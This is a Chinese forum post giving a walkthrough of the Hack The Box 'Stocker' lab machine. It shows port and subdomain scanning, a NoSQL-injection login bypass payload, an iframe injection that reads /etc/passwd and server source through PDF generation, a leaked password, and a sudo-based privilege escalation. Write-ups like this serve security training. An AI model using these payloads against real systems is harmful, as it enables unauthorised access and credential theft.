首页
社区
课程
招聘
[原创]HTB Stocker (easy)
发表于: 2023-1-26 14:01 1608

[原创]HTB Stocker (easy)

2023-1-26 14:01
1608

上来还是信息收集,扫端口扫域名,扫目录

图片描述
第一次 扫描发现状态码 301的很多,过滤下
这里的 过滤不是太会用 ,好像老版本的ffuf有过滤参数,有大佬会教下

图片描述
dirsearch -u 227K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4@1L8$3y4C8k6i4u0Q4x3X3g2Z5N6r3u0Q4x3V1j5`.
图片描述
再扫一下dev下的
dirsearch -u 475K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8W2N6W2)9J5k6i4y4@1L8$3y4C8k6i4u0Q4x3X3g2Z5N6r3u0Q4x3V1j5`.
图片描述
访问c10K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8W2N6W2)9J5k6i4y4@1L8$3y4C8k6i4u0Q4x3X3g2Z5N6r3u0Q4x3V1k6D9L8$3N6A6L8W2!0q4y4#2)9&6z5g2!0n7b7W2!0q4z5g2)9&6z5g2)9^5y4W2!0q4z5g2!0m8x3g2!0n7y4g2!0q4z5g2)9&6c8q4!0m8x3R3`.`.
我们需要身份认证绕过,在这个网址里可以看到相关知识
289K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8$3!0C8i4K6u0W2K9r3q4U0K9%4c8J5K9h3y4C8M7#2)9J5k6i4S2&6P5W2)9J5c8Y4m8W2L8Y4c8W2M7%4c8A6L8X3N6Q4x3X3c8%4k6h3u0Q4x3V1k6F1L8%4y4I4L8q4)9J5k6r3W2F1K9X3g2U0N6r3W2G2L8W2)9J5x3$3u0S2M7$3W2U0i4K6u0V1j5i4g2@1K9r3g2F1N6r3W2U0j5i4c8A6L8$3&6Q4x3X3c8T1P5i4m8S2M7%4x3`.
图片描述

完成登陆绕过,到 /stock页面
图片描述
网站是个购物网站,将物品添加到购物车然后结账
图片描述
图片描述
点击结算页面的here后获得到一个pdf形式的账单
图片描述
图片描述
“title”反馈在pdf中,“orderId”反馈到url
尝试在title处尝试xss
"title":"<iframe src=file:///etc/passwd></iframe>"
相关知识:66bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8$3!0C8i4K6u0W2K9r3q4U0K9%4c8J5K9h3y4C8M7#2)9J5k6i4S2&6P5W2)9J5c8Y4m8W2L8Y4c8W2M7%4c8A6L8X3N6Q4x3X3c8%4k6h3u0Q4x3V1k6^5M7%4y4Q4x3X3c8U0M7X3!0K6M7#2)9J5k6s2y4A6N6r3g2Q4x3X3c8K6j5%4u0A6M7s2c8A6L8X3N6Q4x3V1k6K6k6i4u0$3k6i4u0Q4x3X3c8K6K9h3c8W2i4K6u0V1P5s2y4K6i4K6u0V1k6s2W2F1j5h3#2A6j5#2)9J5k6s2m8V1k6R3`.`.
图片描述
修改下宽高

图片描述
找到一个angoose用户
图片描述
使用插件可以 看出网站使用的node.js
尝试读下js文件
"<iframe src=file:///var/www/dev/index.js height=750px width=750px></iframe>"
图片描述
获得密码IHeardPassphrasesArePrettySecure
尝试登录angoose:IHeardPassphasesArePrettySecure
图片描述
sudo -l发现 指定目录下的js文件都能以root权限运行
图片描述

写一个shell使用目录遍历执行它

图片描述

sudo  nmap -sS -sV -sC  10.10.11.196
sudo  nmap -sS -sV -sC  10.10.11.196
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs  169 -mc 200,204,302,307,401,403,404,405,500
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs  169 -mc 200,204,302,307,401,403,404,405,500
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回